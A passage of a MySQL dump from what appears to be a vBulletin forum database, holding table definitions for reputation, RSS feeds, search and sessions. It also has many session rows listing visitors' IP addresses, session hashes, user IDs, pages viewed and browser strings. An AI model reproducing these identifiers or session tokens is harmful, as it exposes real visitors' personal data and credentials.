`completedby` int(10) unsigned NOT NULL DEFAULT '0',
`completedtime` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`reminderid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `reputation`;
CREATE TABLE `reputation` (
`reputationid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`postid` int(10) unsigned NOT NULL DEFAULT '1',
`userid` int(10) unsigned NOT NULL DEFAULT '1',
`reputation` int(11) NOT NULL DEFAULT '0',
`whoadded` int(10) unsigned NOT NULL DEFAULT '0',
`reason` varchar(250) DEFAULT '',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`reputationid`),
KEY `userid` (`userid`),
KEY `whoadded_postid` (`whoadded`,`postid`),
KEY `multi` (`postid`,`userid`),
KEY `dateline` (`dateline`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `reputationlevel`;
CREATE TABLE `reputationlevel` (
`reputationlevelid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`minimumreputation` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`reputationlevelid`),
KEY `reputationlevel` (`minimumreputation`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `reputationlevel` (`reputationlevelid`, `minimumreputation`) VALUES
(1, -999999),
(2, -50),
(3, -10),
(4, 0),
(5, 10),
(6, 50),
(7, 150),
(8, 250),
(9, 350),
(10, 450),
(11, 550),
(12, 650),
(13, 1000),
(14, 1500),
(15, 2000);
DROP TABLE IF EXISTS `rssfeed`;
CREATE TABLE `rssfeed` (
`rssfeedid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(250) NOT NULL DEFAULT '',
`url` text,
`port` smallint(5) unsigned NOT NULL DEFAULT '80',
`ttl` smallint(5) unsigned NOT NULL DEFAULT '1500',
`maxresults` smallint(6) NOT NULL DEFAULT '0',
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`forumid` smallint(5) unsigned NOT NULL DEFAULT '0',
`prefixid` varchar(25) NOT NULL DEFAULT '',
`iconid` smallint(5) unsigned NOT NULL DEFAULT '0',
`titletemplate` mediumtext,
`bodytemplate` mediumtext,
`searchwords` mediumtext,
`itemtype` enum('thread','announcement') NOT NULL DEFAULT 'thread',
`threadactiondelay` smallint(5) unsigned NOT NULL DEFAULT '0',
`endannouncement` int(10) unsigned NOT NULL DEFAULT '0',
`options` int(10) unsigned NOT NULL DEFAULT '0',
`lastrun` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`rssfeedid`),
KEY `lastrun` (`lastrun`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `rsslog`;
CREATE TABLE `rsslog` (
`rssfeedid` int(10) unsigned NOT NULL DEFAULT '0',
`itemid` int(10) unsigned NOT NULL DEFAULT '0',
`itemtype` enum('thread','announcement') NOT NULL DEFAULT 'thread',
`uniquehash` char(32) NOT NULL DEFAULT '',
`contenthash` char(32) NOT NULL DEFAULT '',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`threadactiontime` int(10) unsigned NOT NULL DEFAULT '0',
`threadactioncomplete` tinyint(3) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`rssfeedid`,`itemid`,`itemtype`),
UNIQUE KEY `uniquehash` (`uniquehash`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `search`;
CREATE TABLE `search` (
`searchid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`ipaddress` char(15) NOT NULL DEFAULT '',
`personal` smallint(5) unsigned NOT NULL DEFAULT '0',
`query` varchar(200) NOT NULL DEFAULT '',
`searchuser` varchar(200) NOT NULL DEFAULT '',
`forumchoice` mediumtext,
`prefixchoice` mediumtext,
`sortby` varchar(200) NOT NULL DEFAULT '',
`sortorder` varchar(4) NOT NULL DEFAULT '',
`searchtime` float NOT NULL DEFAULT '0',
`showposts` smallint(5) unsigned NOT NULL DEFAULT '0',
`orderedids` mediumtext,
`announceids` mediumtext,
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`searchterms` mediumtext,
`displayterms` mediumtext,
`searchhash` varchar(32) NOT NULL DEFAULT '',
`titleonly` smallint(5) unsigned NOT NULL DEFAULT '0',
`completed` smallint(5) unsigned NOT NULL DEFAULT '1',
PRIMARY KEY (`searchid`),
UNIQUE KEY `searchunique` (`searchhash`,`sortby`,`sortorder`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `session`;
CREATE TABLE `session` (
`sessionhash` char(32) NOT NULL DEFAULT '',
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`host` char(15) NOT NULL DEFAULT '',
`idhash` char(32) NOT NULL DEFAULT '',
`lastactivity` int(10) unsigned NOT NULL DEFAULT '0',
`location` char(255) NOT NULL DEFAULT '',
`useragent` char(100) NOT NULL DEFAULT '',
`styleid` smallint(5) unsigned NOT NULL DEFAULT '0',
`languageid` smallint(5) unsigned NOT NULL DEFAULT '0',
`loggedin` smallint(5) unsigned NOT NULL DEFAULT '0',
`inforum` smallint(5) unsigned NOT NULL DEFAULT '0',
`inthread` int(10) unsigned NOT NULL DEFAULT '0',
`incalendar` smallint(5) unsigned NOT NULL DEFAULT '0',
`badlocation` smallint(5) unsigned NOT NULL DEFAULT '0',
`bypass` tinyint(4) NOT NULL DEFAULT '0',
`profileupdate` smallint(5) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`sessionhash`)
) ENGINE=MEMORY DEFAULT CHARSET=latin1;
INSERT INTO `session` (`sessionhash`, `userid`, `host`, `idhash`, `lastactivity`, `location`, `useragent`, `styleid`, `languageid`, `loggedin`, `inforum`, `inthread`, `incalendar`, `badlocation`, `bypass`, `profileupdate`) VALUES
('2e2821b2c3fd1ea54114e2f10f3786fc', 0, '66.249.75.65', '37a60411c341250cf0113f4eba911963', 1465340985, '/member.php?u=29', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5fc15aa71ef2ba1143e7d519cad50651', 0, '66.249.75.49', '37a60411c341250cf0113f4eba911963', 1470371269, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('553d97b5707e4ea1f6c8f44856f70c7a', 0, '82.76.203.185', 'cc006e4490a653bfcfb23146d58310ab', 1465463020, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('dca581611094eefff7cd2199f7177e63', 0, '31.205.73.194', '2b600001a8a63fa6c7d8f7e688dcc7de', 1465285819, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9f16eb681616dcb03d115d2bbef7470c', 161, '172.68.29.181', '9a23805a733ff0e56cb591cfab7efb9f', 1465285046, '/usercp.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('25c985becdeab029a8ef13490a456a75', 384, '37.48.85.25', 'ca2599fd0d44ba914a6fa0a3dac8ae31', 1465328682, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('b1e4e02a2d5509e55ed7c785d41ce78e', 0, '37.106.178.92', '720fd4c6abedd3c930f9b0f3c5e32eb8', 1465326294, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f2eedbaa1cc390732c8d008fe1ad6300', 0, '2601:19b:8100:3', 'bec5d0d75755192ea3099812c9ad854e', 1465284588, '/index.php', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c283339d61590feba443c913ad8d9c88', 0, '38.125.181.2', 'a67b5858822252dcac335ffd697c720e', 1465326182, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ad9cee95e8394de7a53c1a02bab7e96e', 0, '159.148.186.194', 'd2698c4279535e0719c74aefae17ef13', 1465283592, '/showthread.php?p=3046', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('138834945dbfe4aecf9e6ed7fe5ec7d5', 0, '217.69.133.221', 'adec92f43af45575d1a28ddcb0eea331', 1465400270, '/showthread.php?p=2798', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7c34df360c3d6a978f51e9cb06fa5829', 0, '217.69.133.226', 'adec92f43af45575d1a28ddcb0eea331', 1465325699, '/faq.php', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('97080bc313137a64ceb4520a8f8c2eb4', 0, '2a02:598:a::78:', '204c6444af6dd1c3e5ce9410a05254f0', 1472755220, '/search.php?do=getnew', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6e180bf72fb06a708a942c10f730fdab', 0, '174.117.120.171', 'a2a393c412d6bf55e459afa885a37df2', 1465276946, '/register.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4b874e75700e6b7b5fce57f182f3cd05', 0, '178.82.100.10', 'dd84d58b931c7ca7702adbcd537d7048', 1465325615, '/showthread.php?p=3002', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1c69f00bb2925708058c00a6513ea8cd', 0, '2a02:598:2::165', 'e46e330e1f4b55856abae31b78fec7c9', 1466858246, '/register.php?', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3f6505615e4bba75d388be2a14c515f0', 0, '172.68.10.246', 'db7160cf7a6c07f01903baf7b1b132b5', 1465324923, '/showthread.php?t=1030', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c24b062c0af8e23ad5c39354aa5f8f24', 0, '87.55.7.8', '480d74f31a5ae93c201df9c50f08f14d', 1465323098, '/showthread.php?t=1030', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6690bbfeccd9296e590e6f5bbc5042d4', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465322987, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('f41437e394c95428d42ad6879645c480', 0, '167.57.65.131', '4f5175969290af092938bf7e55079cbf', 1465322714, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cd8a4573e648e8a84a4ebf74b6f705fb', 0, '149.202.57.216', 'e660348c36978fa386e11b38e4ecd063', 1467577177, '/index.php', 'Mozilla/5.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1c62f7bceb47be12a44c01adda9d4a25', 0, '217.23.13.105', '2eccede8aa91c3f30376e817013fd183', 1466180245, '/forumdisplay.php?f=37', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('26b519563b4f951b6246a24a089cd815', 0, '2602:306:3701:2', 'e69840712fcf1522b25d86b7ab8ee47a', 1465276604, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('380fbd5c15430d48da3fcfe96da6cb9e', 0, '75.56.246.94', '3325025ec873464861e864acf5e34954', 1465321631, '/showthread.php?p=3046', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0fcd30a116e378013b4b0be2760491a9', 0, '207.46.13.100', '5e207e311e22cdc3b2095126a922fa93', 1465321279, '/misc.php?do=showrules', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('550f15a35005b13230899864991461e4', 0, '172.68.11.239', 'fa155d531ff5edc650a1debf812d7317', 1465320545, '/showthread.php?p=3046', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 S', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b1cdfe348183be1bf78ef74fc583441d', 0, '86.26.135.162', 'b3fbb2d4ab2bba3e5204c311d0c457f7', 1465319150, '/showthread.php?t=1030', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fb09ad60df03a095a8a6ef68f77a601f', 0, '185.24.34.7', '94f1e375cbdf9cda2dfe6d0d85caabb1', 1465317502, '/showthread.php?t=1841', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('18823fc745b2a8aa0fe0c085e310cb2c', 0, '90.62.251.83', 'e8d40b8f65ea6221a6a3b110bd28a0b8', 1465416460, '/forumdisplay.php?f=37', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2e15094b8f46e65c8f2a6b1343114aae', 0, '84.216.40.117', '568b2f0ed96fdd9304c6c9125e42bd24', 1465313204, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('766b778bcfda8cd84ec02bf6720fe021', 0, '180.180.99.198', '1cf7143095d557d448f9a1a76f3f4e2c', 1465312821, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a87475a55e67ab89d7f24423d83aa150', 0, '178.128.200.130', 'bd1214642bb4d4ed6ed78fc6914bbf50', 1465312131, '/showthread.php?p=3046', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('edb4de93fcf06a103b82635d632d8a3c', 0, '77.226.107.49', '982b1dab2a7a09be8466d6df07944fe3', 1465309900, '/showthread.php?p=3045', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8a4410179e654fbbcaf13e31af6bb4f2', 0, '91.217.91.54', '51a05fbbb652aa808bbf2f0b88ca3e5d', 1465309863, '/register.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2450.0 Iron/4', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('59dc4df56aa05f91a7e53defe8b9a52f', 0, '197.7.0.255', '057af6bf567082c1c62c2fc05e90ec02', 1465309685, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('60f60d0094b198838ec0be1941ea409e', 161, '54.233.145.152', '9a23805a733ff0e56cb591cfab7efb9f', 1465309382, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('e8f9c6901b919cb897bfc762367d02cb', 0, '69.246.9.49', '5e292ec790a2be59c5a6490dba9a59aa', 1465307250, '/forumdisplay.php?f=37', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4a3349809e10630168619b27828bd166', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465306955, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('ea6ce58292935447a81fea7156541dbf', 0, '172.68.29.193', 'c4c5f01aacc3fe8145a11a1fce3fc30a', 1465306585, '/announcement.php?f=37', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f1fe7d8b46d23cdfbb7c0f10aa36ada8', 0, '94.25.233.35', 'c170b03d09530756cf79cee35cb97449', 1465303203, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('151150caa4f7d47145de4eec6d3bc859', 306, '172.68.10.245', '3e0fd3e706c26e31ac5b51338f604e1f', 1465302247, '/member.php?u=306', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safar', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('b05a8bc136dcc6ebe1a3ca17f20f6bf8', 161, '54.233.145.152', '9a23805a733ff0e56cb591cfab7efb9f', 1465301392, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('70973046e70ec54d91323894a72c0913', 0, '38.122.73.38', 'b0d9a33102ee69e37c6268725f33d261', 1465299290, '/showthread.php?t=2505', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('681e75d7e78eef80fead49a3b12181f4', 0, '54.166.106.91', '5affdd5d363980bf4625835d7a7cb662', 1465298638, '/showthread.php?p=2928', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5f79766a2edcc29391f075d83ef8e49c', 0, '5.79.86.129', 'c399e025a58d8980b4b92b10c7839e11', 1465298377, '/register.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c4f8e0427cfaf7179808d3d54168cbe1', 0, '172.68.10.244', '37894d5677a1bca1f0759453a76a7001', 1465297816, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fa8d15dfd36601e4dc5ca1a94baa3a01', 0, '2.27.162.124', '778178a63a7db25d62575803b7837676', 1465296919, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('473c08d9b6090e68b647f1e269982c7b', 0, '105.112.17.53', '1c1d6e57194fa95ac6ee48f622cfc1c6', 1465296122, '/memberlist.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fc2609309ee5d165730e9b8dec97e965', 0, '85.248.227.164', '5406b3dc5c01b02169988869e1e77764', 1465343153, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b7b9896993ec1e63ef2409cfef51efc2', 0, '81.17.16.116', '12343dd440cd8961574948cbc15a7e77', 1465294843, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fd54a3954be82f3719e589f26bc57910', 0, '176.114.124.17', '62a178c5802a9f3bf77a58c31213bc15', 1465238556, '/showthread.php?t=1062', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2739.0 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c3b39ebd3f0299553879563c086d51df', 0, '127.0.0.1', 'c7d3348a11a065559bbea796ade96462', 1465370810, '/showthread.php?t=2505', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('906b70664a32ed342642362bc4c09f07', 169, '85.105.178.242', '5db609e9235e4ee42140e58be1b8c69a', 1465293488, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/5', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('525755f8208c51f23471fc6d210f96ea', 0, '31.24.221.3', '366ff5fa0f5a8a8ed165c9b1a398ef39', 1465381884, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b79835e99233efe44e742d2ab873d541', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465291395, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('8372d2060162e80d7b42f84c24800edd', 0, '90.255.49.180', '5bab91cd4a39cdbdfe199eb2c078730c', 1465300434, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c1f8d59d51a3315cb538e73bdb0eb923', 0, '199.59.148.210', '4b4ee0203c0f40a032f0bff548803b25', 1475260102, '/showthread.php?p=3002', 'Twitterbot/1.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ebb7ab53ffd2bfa06896199d2bdc0bf6', 0, '107.77.218.144', '6faa255209540a65a052282b67c2fa1c', 1465236126, '/index.php', 'Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG-SM-G800A Build/LMY47X) AppleWebKit/537.36 (KHTML, like Ge', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('63d590188299329bb138026acdd510c5', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465235778, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('ae340b1e02e37bda05e37635aaf367f6', 0, '172.68.10.202', '54fe18c99e79a2671eb7a5764ccbbb4c', 1469610366, '/member.php?u=169', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c1414f78ae7298b6a9532ada9f5d7b25', 0, '2a02:2f0c:508f:', '8f24fa9a5b657efe686d410bde95aaf9', 1465230355, '/showthread.php?t=2346', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.', 0, 0, 0, 37, 2346, 0, 0, 0, 0),
('aff4e9faef40c544e7853433ac415cb7', 0, '37.187.7.74', 'c6f972906e56c102587c651d778e91e7', 1465261433, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2fe58f7789988011a2d90d451eed4102', 0, '189.202.66.50', '6e2fa37f18189643034da1f1d070528a', 1465257587, '/register.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f8c31f7c9a3f6bdbed13a830c4008e43', 0, '172.68.10.244', '448b6e6ec50589d47dee04ea6de00aa8', 1468158201, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 YaB', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bf6d891d3bc76526d87c89fff27331a2', 0, '66.249.65.55', '2b2ff7461e581eb89ef4dc9afe8de380', 1474960631, '/showthread.php?p=1294', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('933bbed810eb4304d82c9d76f0da1aef', 0, '79.134.234.247', 'c6331fa0354fc7391a6d0acda1a992b6', 1465254909, '/faq.php', 'Mozilla/5.0 (Linux; Android 5.0.2; Redmi Note 3 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1447988ff08a3ca8f6d726a9ce7bec04', 0, '74.192.132.31', 'a0a205f8e0a623dd34d8ccd6e9d5836f', 1465253590, '/faq.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f16594dd8c90a6fcf5143a4e1e56af32', 0, '46.165.230.5', '5697259fd9cae36240d6e95329921caa', 1465252040, '/login.php?do=logout&logouthash=1465252037-5329d4c4cbdc26911dcdc5750efdc2d7c5cb4988', 'Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('293554947a1d9eb84d6956f73dda8d2a', 0, '127.0.0.1', 'd6aced3941ef69b57c815b64c9a9fed2', 1465251934, '/archive/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('b828f6c89d1521a7f269ecb74658c953', 0, '172.68.11.248', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1475342567, '/showthread.php?t=2351', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('899c8f7097eb7089e78e5b091c7fe40f', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465276368, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('508a790c925cce0f6dedf724bcd0b3a0', 330, '37.187.129.166', '642d8b2f144306e82b4c93d2bc08298d', 1467813419, '/search.php?do=process&do=process', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('9536157835a83a5858c4e06caaaaeb89', 0, '2a02:598:2::110', 'f08d9940371f9f371d765f259bf4cae6', 1467071688, '/online.php?', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
